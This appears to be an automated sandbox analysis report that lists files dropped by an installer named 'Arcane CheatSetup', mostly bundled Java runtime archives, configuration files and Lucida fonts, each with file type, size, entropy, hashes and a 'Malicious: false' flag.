                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3860522
                                Entropy (8bit):7.9670916513081735
                                Encrypted:false
                                SSDEEP:98304:PI1SwP9utPgTIb0bxSxwF1nNZVdEILeH9IIyYNO4Inwz:PI1HYgkoxSxI9fs4UVIwz
                                MD5:AE86774D28F1C8270A9BCBD12A9A1865
                                SHA1:7806C70550F435C2C87D2D15E427E5A9F97774E4
                                SHA-256:0402FBCB23D381DEDE4DF4228F2D100D8693C5B3BAB885AB5EB98BCC0A269786
                                SHA-512:2EA1E0372A087915FFFCCA2DEFC817C37BD038B02824BFEC1DA4E881A4C908A93AEB37DAA38840F75BCEAFD02EC09088FE648B0305DA0407E93407EAC770BE63
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2018860
                                Entropy (8bit):7.9328569913001905
                                Encrypted:false
                                SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                MD5:F3E3E7769994C69DFF6E35EF938443CA
                                SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):32699
                                Entropy (8bit):7.878192531974338
                                Encrypted:false
                                SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                MD5:2249EAC4F859C7BC578AFD2F7B771249
                                SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):8286
                                Entropy (8bit):7.790619326925194
                                Encrypted:false
                                SSDEEP:192:tX5jIgU7WbMCc0XmHTEIWB7EH+mqcEb+wYtvEmkbKdG:tXZU7WbMoWTFWBAH+BCrEmkh
                                MD5:7FA7F97FA1CC0CC8ACC37B9DAE4464AE
                                SHA1:C143646A6DBE2EBDB1FBF69C09793E7F07DBC1F5
                                SHA-256:36820223C5B9A225DC3FF7C1C3930BDB112F1D9AAB2BEE954FF1A1C1828E2C54
                                SHA-512:AD9A0E358BE7A765B4A554E6BBE35BDD61A52BCAC9F21915D84C2A1929780150DFDCF0E43121D0E844082B1BB92873ED848ACF9B38FF3C7D826E5D0F5D32C26C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):250826
                                Entropy (8bit):7.951088517189604
                                Encrypted:false
                                SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187727
                                Entropy (8bit):7.7958934328326075
                                Encrypted:false
                                SSDEEP:3072:aMxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBPlHl:nNduOJv29amxGiDtonI87aGBPlF
                                MD5:82C16750374D5CCA5FDAA9434BAF8143
                                SHA1:9B49F07BFB6F4AE73EB9B2FADCAE46E02E31F023
                                SHA-256:1F0966EBD65544669395E9F490A3D397DCF122D5261566734BB422C68CFE64B8
                                SHA-512:12A32FBE2A0A824EC33BD6D0A22066C0CB74D13EEBC16622FFE420CD48B4EB5878C981384DEBE30285D6231B3224E5CD2380C22D8C18624E52E5C74B62221661
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):18192143
                                Entropy (8bit):5.977388717447885
                                Encrypted:false
                                SSDEEP:49152:ZxJ9lXlkEhZWLyyQSgxv1/FGfnIWkRXe2p0F7tjRozGfVgMS55pU13JbL5xli3d6:ZhLk2bBSgnFGfnhAXLzAeylvi3dGT
                                MD5:042B3675517D6A637B95014523B1FD7D
                                SHA1:82161CAF5F0A4112686E4889A9E207C7BA62A880
                                SHA-256:A570F20F8410F9B1B7E093957BF0AE53CAE4731AFAEA624339AA2A897A635F22
                                SHA-512:7672D0B50A92E854D3BD3724D01084CC10A90678B768E9A627BAF761993E56A0C6C62C19155649FE9A8CEEABF845D86CBBB606554872AE789018A8B66E5A2B35
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1511
                                Entropy (8bit):5.142622776492157
                                Encrypted:false
                                SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):39771
                                Entropy (8bit):7.92713480980539
                                Encrypted:false
                                SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):44516
                                Entropy (8bit):7.905075370162141
                                Encrypted:false
                                SSDEEP:768:2YVL1eqfgKbWnXuZ/QvfBPJr+A6tkZQnWn109KqM9jE4z:2KL1eWgfnXuEfJQAdQnWn10kqg3z
                                MD5:1A33FF1FDD789E655D5E2E99E9E719BD
                                SHA1:AE88E6000EBD7F547E3C047FC81AE1F65016B819
                                SHA-256:A23A9A653A261C640703B42839137F8C4BF7650665E62DBDD7D538171BD72516
                                SHA-512:0451393D805414D6633824F3D18B609F7495324FAB56DF4330E874A8995BD9E0DA567D77DB682D7FD1544CD7E6A3D10745C23DB575035E391B02D6EE4C4362FD
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):18192143
                                Entropy (8bit):5.977388717447885
                                Encrypted:false
                                SSDEEP:49152:ZxJ9lXlkEhZWLyyQSgxv1/FGfnIWkRXe2p0F7tjRozGfVgMS55pU13JbL5xli3d6:ZhLk2bBSgnFGfnhAXLzAeylvi3dGT
                                MD5:042B3675517D6A637B95014523B1FD7D
                                SHA1:82161CAF5F0A4112686E4889A9E207C7BA62A880
                                SHA-256:A570F20F8410F9B1B7E093957BF0AE53CAE4731AFAEA624339AA2A897A635F22
                                SHA-512:7672D0B50A92E854D3BD3724D01084CC10A90678B768E9A627BAF761993E56A0C6C62C19155649FE9A8CEEABF845D86CBBB606554872AE789018A8B66E5A2B35
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1178848
                                Entropy (8bit):7.964832897711047
                                Encrypted:false
                                SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1511
                                Entropy (8bit):5.142622776492157
                                Encrypted:false
                                SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2018860
                                Entropy (8bit):7.9328569913001905
                                Encrypted:false
                                SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                MD5:F3E3E7769994C69DFF6E35EF938443CA
                                SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):39771
                                Entropy (8bit):7.92713480980539
                                Encrypted:false
                                SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):279427
                                Entropy (8bit):7.90277234368113
                                Encrypted:false
                                SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                MD5:B04074A9FC78DC1409168E1E2D139647
                                SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):32699
                                Entropy (8bit):7.878192531974338
                                Encrypted:false
                                SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                MD5:2249EAC4F859C7BC578AFD2F7B771249
                                SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):250826
                                Entropy (8bit):7.951088517189604
                                Encrypted:false
                                SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):68923
                                Entropy (8bit):7.950933538093809
                                Encrypted:false
                                SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4005
                                Entropy (8bit):4.909684349537555
                                Encrypted:false
                                SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                MD5:B0CE9F297D3FEC6325C0C784072908F1
                                SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                Malicious:false
                                Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:raw G3 (Group 3) FAX
                                Category:dropped
                                Size (bytes):3670
                                Entropy (8bit):4.40570512634857
                                Encrypted:false
                                SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                MD5:E0E5428560288E685DBFFC0D2776D4A6
                                SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10779
                                Entropy (8bit):5.217016051711063
                                Encrypted:false
                                SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                MD5:0C1DB7410938A3634BD9928BA2F284CB
                                SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                Malicious:false
                                Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                Category:dropped
                                Size (bytes):75144
                                Entropy (8bit):6.849420541001734
                                Encrypted:false
                                SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                Category:dropped
                                Size (bytes):75124
                                Entropy (8bit):6.805969666701276
                                Encrypted:false
                                SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                Category:dropped
                                Size (bytes):80856
                                Entropy (8bit):6.821405620058844
                                Encrypted:false
                                SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                MD5:4D666869C97CDB9E1381A393FFE50A3A
                                SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                Category:dropped
                                Size (bytes):344908
                                Entropy (8bit):6.939775499317555
                                Encrypted:false
                                SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                MD5:630A6FA16C414F3DE6110E46717AAD53
                                SHA1:5D7ED564791C900A8786936930BA99385653139C
                                SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                Category:dropped
                                Size (bytes):317896
                                Entropy (8bit):6.869598480468745
                                Encrypted:false
                                SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                MD5:5DD099908B722236AA0C0047C56E5AF2
                                SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                Category:dropped
                                Size (bytes):698236
                                Entropy (8bit):6.892888039120645
                                Encrypted:false
                                SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                MD5:B75309B925371B38997DF1B25C1EA508
                                SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                Category:dropped
                                Size (bytes):234068
                                Entropy (8bit):6.901545053424004
                                Encrypted:false
                                SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
